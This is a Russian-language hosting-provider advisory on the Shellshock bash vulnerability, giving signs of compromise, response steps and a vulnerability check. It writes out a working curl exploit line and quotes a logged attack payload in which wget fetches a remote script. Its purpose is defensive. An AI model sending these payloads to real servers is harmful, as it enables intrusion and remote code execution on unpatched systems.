Наверняка вы уже слышали об обнаруженной в сентябре этого года уязвимости “Bash Shellshock”. Уязвимость присутствует в 100% старых операционных систем, использующихся нашими клиентами услуги VDS и Dedicated. Подробные инструкции по обновлению bash представлены в статье на нашем сайте. На данный момент, среди наших клиентов уже зафиксированы случаи взлома серверов с необновленным bash.
Как понять, что вас взломали? На взломанном сервере резко возрастает потребление трафика и объем используемых ресурсов процессора, запускаются “подозрительные”” процессы, в crontab прописываются сторонние команды.
Эксплуатируют уязвимость “Bash Shellshock” таким образом:
curl -H "User-Agent: () { :;};/usr/bin/id" http://(ip-адрес)/cgi-bin/php
После этого от имени www-data запускается:
-- /usr/bin/id.
Так выглядит запись в логе веб-сервера об атаке:
127.0.0.1:80 178.60.32.36 - - [20/Oct/2014:01:44:45 +0600] "GET /cgi-bin/php HTTP/1.1" 500 811 "-" "() { :;}; /usr/bin/wget -O /tmp/c.pl --no-check-certificate http://(ip-адрес)/t.txt
На взломанном сервере можно наблюдать сторонние команды в crontab:
root@uХХХХХ:~# cat /var/spool/cron/crontabs/www-data
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (cron installed on Mon Oct 20 01:22:02 2014)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
* * * * * /dev/shm/.f/update >/dev/null 2>&1
root@uХХХХХ:~# ls /dev/shm/.f/update
/dev/shm/.f/update
А так же “сторонние” процессы от пользователя www-data (от которого должен быть запущен только apache/nginx):
root@uХХХХХ:~# ps axu | grep www-data
...
www-data 21639 12.6 0.1 4568 2416 ? R 00:26 15:42 klogd -x
www-data 22806 0.0 0.0 4568 1684 ? S 01:22 0:00 klogd -x
www-data 22810 0.0 0.0 2112 952 ? Ss 01:22 0:02 crond
www-data 23634 1.1 0.1 4568 2436 ? S 01:52 0:26 klogd -x
...
Мы приняли срочные меры по устранению проблемы: чтобы прекратить попытки взлома, настроили фильтрацию для серверов на которых размещаются клиенты с услугой VDS, кроме того выполнили автоматизированное обновление bash на 99% виртуальных Облачных серверов наших клиентов. В связи с этим обращаем ваше внимание на необходимость незамедлительного обновления bash!
Для проверки вашего bash на предмет уязвимости достаточно зайти в консоль сервера и выполнить вот такую команду:
env X="() { :;} ; echo vulnerable" bash -c "echo stuff"
Если в результате выполнения этой команды вы увидите две строки и одна из них будет со словом ‘vulnerable’, ваш bash уязвим.
Если вы не знаете как произвести обновление или даже как проверить уязвима ли операционная система на вашем сервере, рекомендуем обратиться в нашу техническую поддержку по телефонам +7 (343) 253-55-00, 8-800-2000-699 или электронной почте info@netangels.ru. Работы по обновлению системы будут произведены на платной основе по нашему прейскуранту.